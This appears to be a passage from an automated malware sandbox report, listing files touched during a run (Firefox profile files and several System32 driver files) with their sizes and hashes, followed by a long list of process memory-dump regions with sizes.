                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\prefs-1.js

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  ddeb29f3b7720b21c7930ff41ce64a83

                                                  SHA1

                                                  573ab4840b3308064ceb29591ef3c3bce45e3cb8

                                                  SHA256

                                                  1885ed19dbb680dd0bb702881169ff2c0e0ffe3157b6a7d0683798b76ab49581

                                                  SHA512

                                                  75ff508fc20194716abc0f129e4e9f30f3832e7276edc045fcbb78e52fe823fe73029dca21ed861e4b6e45ca5f14bab2e282886db087be1ee3c8255ddd3f7735

                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\prefs.js

                                                  Filesize

                                                  6KB

                                                  MD5

                                                  4efca16a8d40da1799c6e9602beb7846

                                                  SHA1

                                                  3f1c50e6fba329c4695691d6d3a7a23ff0fbffc0

                                                  SHA256

                                                  f6a1a77781cfa730a53ffb6da9a68ed070e8a5b5c292f37b2cca29ae01f0f5fb

                                                  SHA512

                                                  e51267bdb06f8a8d96acb5d4fdd7b716a4ba4839b7c7ce7e78bccee788829ed663b47110e1007253866afbc264b6469620058584c18c137dc1c63deca2ac7c6c

                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionstore-backups\recovery.baklz4

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  f10df306d69653198b6e29d305879807

                                                  SHA1

                                                  e44c5da3c86d55f02f9da844a4ddf964ff1925be

                                                  SHA256

                                                  4b5e7b9ad9364b4fc2c6977632c95ad18d29e1a3b53a00fbb211bf8821c9c126

                                                  SHA512

                                                  7cbf3e52cfab3d532a3fad2ba2b1c4be5b75bd7c87d8d6955e89251030717c657e02ea6ea24fbc421caa7041c0e292fa38548400c13ccacffc5653cfbc80aabf

                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cpfbcvxr.default-release\sessionstore-backups\recovery.jsonlz4

                                                  Filesize

                                                  4KB

                                                  MD5

                                                  8735a312ead7b0f96424a8a24d35e38a

                                                  SHA1

                                                  99bc57fc289155b2dbb3547727f64bfeb6a9ad6c

                                                  SHA256

                                                  900077570cdd49ee1b7cc4d09b87c61c9a12aac2bd487645ead962fc2e5299c9

                                                  SHA512

                                                  7f2d589e23eb7538e7b770c498595d59b0d53001043831882d8c6708a42aca447f611fa6f16f8badca534db65ec21055da8136963719cf329500d3880f0040f3

                                                • C:\Windows\System32\drivers\367f83e6.sys

                                                  Filesize

                                                  368KB

                                                  MD5

                                                  990442d764ff1262c0b7be1e3088b6d3

                                                  SHA1

                                                  0b161374074ef2acc101ed23204da00a0acaa86e

                                                  SHA256

                                                  6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                  SHA512

                                                  af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                • C:\Windows\System32\drivers\klupd_367f83e6a_klark.sys

                                                  Filesize

                                                  355KB

                                                  MD5

                                                  9cfe1ced0752035a26677843c0cbb4e3

                                                  SHA1

                                                  e8833ac499b41beb6763a684ba60333cdf955918

                                                  SHA256

                                                  3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                  SHA512

                                                  29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                • C:\Windows\System32\drivers\klupd_367f83e6a_klbg.sys

                                                  Filesize

                                                  199KB

                                                  MD5

                                                  424b93cb92e15e3f41e3dd01a6a8e9cc

                                                  SHA1

                                                  2897ab04f69a92218bfac78f085456f98a18bdd3

                                                  SHA256

                                                  ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                  SHA512

                                                  15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                • C:\Windows\System32\drivers\klupd_367f83e6a_mark.sys

                                                  Filesize

                                                  260KB

                                                  MD5

                                                  66522d67917b7994ddfb5647f1c3472e

                                                  SHA1

                                                  f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                  SHA256

                                                  5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                  SHA512

                                                  921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                • memory/740-498-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

                                                  Filesize

                                                  104KB

                                                • memory/740-465-0x0000000006560000-0x000000000657E000-memory.dmp

                                                  Filesize

                                                  120KB

                                                • memory/740-434-0x0000000002F80000-0x0000000002FB6000-memory.dmp

                                                  Filesize

                                                  216KB

                                                • memory/740-458-0x00000000060E0000-0x0000000006434000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                • memory/740-466-0x00000000065B0000-0x00000000065FC000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/740-446-0x0000000005E90000-0x0000000005EF6000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/740-440-0x0000000005680000-0x0000000005CA8000-memory.dmp

                                                  Filesize

                                                  6.2MB

                                                • memory/740-445-0x0000000005CE0000-0x0000000005D02000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/740-771-0x00000000079A0000-0x00000000079C2000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/740-770-0x0000000007A10000-0x0000000007AA6000-memory.dmp

                                                  Filesize

                                                  600KB

                                                • memory/740-452-0x0000000005F70000-0x0000000005FD6000-memory.dmp

                                                  Filesize

                                                  408KB

                                                • memory/740-497-0x0000000007CB0000-0x000000000832A000-memory.dmp

                                                  Filesize

                                                  6.5MB

                                                • memory/740-772-0x00000000088E0000-0x0000000008E84000-memory.dmp

                                                  Filesize

                                                  5.6MB

                                                • memory/1500-2651-0x00000000008E0000-0x0000000000A68000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/1500-2648-0x00000000008E0000-0x0000000000A68000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/1500-2649-0x00000000008E0000-0x0000000000A68000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/1500-2650-0x00000000008E0000-0x0000000000A68000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/1500-2646-0x0000000140000000-0x000000014043F000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/2044-32987-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/2044-32816-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/2480-31636-0x000001AD30C60000-0x000001AD30C78000-memory.dmp

                                                  Filesize

                                                  96KB

                                                • memory/3064-897-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-900-0x0000000004210000-0x0000000004610000-memory.dmp

                                                  Filesize

                                                  4.0MB

                                                • memory/3064-904-0x0000000075D80000-0x0000000075F95000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/3064-898-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-899-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-895-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-896-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-901-0x0000000004210000-0x0000000004610000-memory.dmp

                                                  Filesize

                                                  4.0MB

                                                • memory/3064-894-0x0000000004190000-0x000000000420F000-memory.dmp

                                                  Filesize

                                                  508KB

                                                • memory/3064-902-0x00007FFE0C110000-0x00007FFE0C305000-memory.dmp

                                                  Filesize

                                                  2.0MB

                                                • memory/3720-857-0x0000000000D40000-0x00000000011F6000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/3720-860-0x0000000000D40000-0x00000000011F6000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4256-848-0x0000000000400000-0x0000000000463000-memory.dmp

                                                  Filesize

                                                  396KB

                                                • memory/4256-847-0x0000000000400000-0x0000000000463000-memory.dmp

                                                  Filesize

                                                  396KB

                                                • memory/4344-812-0x0000000000400000-0x0000000000464000-memory.dmp

                                                  Filesize

                                                  400KB

                                                • memory/4344-813-0x0000000000400000-0x0000000000464000-memory.dmp

                                                  Filesize

                                                  400KB

                                                • memory/4664-73-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-1456-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-303-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-2510-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-939-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-22-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-21-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-19-0x0000000000ED1000-0x0000000000EFF000-memory.dmp

                                                  Filesize

                                                  184KB

                                                • memory/4664-790-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-861-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-294-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-18-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4664-20-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4796-784-0x00000000001A0000-0x0000000000656000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4796-780-0x00000000001A0000-0x0000000000656000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/4932-1339-0x00000000007C0000-0x0000000000BF8000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/4932-2125-0x00000000007C0000-0x0000000000BF8000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/4932-2372-0x00000000007C0000-0x0000000000BF8000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/4932-1303-0x00000000007C0000-0x0000000000BF8000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/4932-1336-0x00000000007C0000-0x0000000000BF8000-memory.dmp

                                                  Filesize

                                                  4.2MB

                                                • memory/4944-821-0x0000000005C00000-0x0000000005F54000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                • memory/4944-832-0x00000000062E0000-0x000000000632C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/4988-795-0x0000000005F00000-0x0000000006254000-memory.dmp

                                                  Filesize

                                                  3.3MB

                                                • memory/4988-810-0x0000000006450000-0x000000000649C000-memory.dmp

                                                  Filesize

                                                  304KB

                                                • memory/5108-4-0x0000000000DE0000-0x000000000128A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5108-17-0x0000000000DE0000-0x000000000128A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5108-1-0x0000000077444000-0x0000000077446000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/5108-3-0x0000000000DE0000-0x000000000128A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5108-0-0x0000000000DE0000-0x000000000128A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/5108-2-0x0000000000DE1000-0x0000000000E0F000-memory.dmp

                                                  Filesize

                                                  184KB

                                                • memory/5548-905-0x00000000008E0000-0x00000000008EA000-memory.dmp

                                                  Filesize

                                                  40KB

                                                • memory/5548-907-0x0000000000FA0000-0x00000000013A0000-memory.dmp

                                                  Filesize

                                                  4.0MB

                                                • memory/5548-910-0x0000000075D80000-0x0000000075F95000-memory.dmp

                                                  Filesize

                                                  2.1MB

                                                • memory/5548-908-0x00007FFE0C110000-0x00007FFE0C305000-memory.dmp

                                                  Filesize

                                                  2.0MB

                                                • memory/5584-878-0x0000000000D90000-0x000000000109E000-memory.dmp

                                                  Filesize

                                                  3.1MB

                                                • memory/5584-876-0x0000000000D90000-0x000000000109E000-memory.dmp

                                                  Filesize

                                                  3.1MB

                                                • memory/5784-893-0x0000000000150000-0x00000000007ED000-memory.dmp

                                                  Filesize

                                                  6.6MB

                                                • memory/5784-911-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                  Filesize

                                                  972KB

                                                • memory/5784-31270-0x0000000000150000-0x00000000007ED000-memory.dmp

                                                  Filesize

                                                  6.6MB

                                                • memory/5784-1000-0x0000000000150000-0x00000000007ED000-memory.dmp

                                                  Filesize

                                                  6.6MB

                                                • memory/5784-1004-0x0000000000150000-0x00000000007ED000-memory.dmp

                                                  Filesize

                                                  6.6MB

                                                • memory/5784-1850-0x0000000000150000-0x00000000007ED000-memory.dmp

                                                  Filesize

                                                  6.6MB

                                                • memory/6304-2174-0x0000000000400000-0x000000000069A000-memory.dmp

                                                  Filesize

                                                  2.6MB

                                                • memory/6652-2194-0x00000214477C0000-0x0000021447831000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/6652-2187-0x00000214477C0000-0x0000021447831000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/6652-2177-0x0000000000C90000-0x0000000000C92000-memory.dmp

                                                  Filesize

                                                  8KB

                                                • memory/6652-2180-0x00000214477C0000-0x0000021447831000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/6652-2195-0x00000214477C0000-0x0000021447831000-memory.dmp

                                                  Filesize

                                                  452KB

                                                • memory/6788-2234-0x000001B66B470000-0x000001B66B492000-memory.dmp

                                                  Filesize

                                                  136KB

                                                • memory/6864-2407-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/6864-2394-0x0000000000ED0000-0x000000000137A000-memory.dmp

                                                  Filesize

                                                  4.7MB

                                                • memory/7784-31646-0x0000000000400000-0x0000000000E1B000-memory.dmp

                                                  Filesize

                                                  10.1MB

                                                • memory/7784-31630-0x0000000000400000-0x0000000000E1B000-memory.dmp

                                                  Filesize

                                                  10.1MB

                                                • memory/8264-31697-0x0000000000400000-0x0000000000CF7000-memory.dmp

                                                  Filesize

                                                  9.0MB

                                                • memory/8264-31674-0x0000000000400000-0x0000000000CF7000-memory.dmp

                                                  Filesize

                                                  9.0MB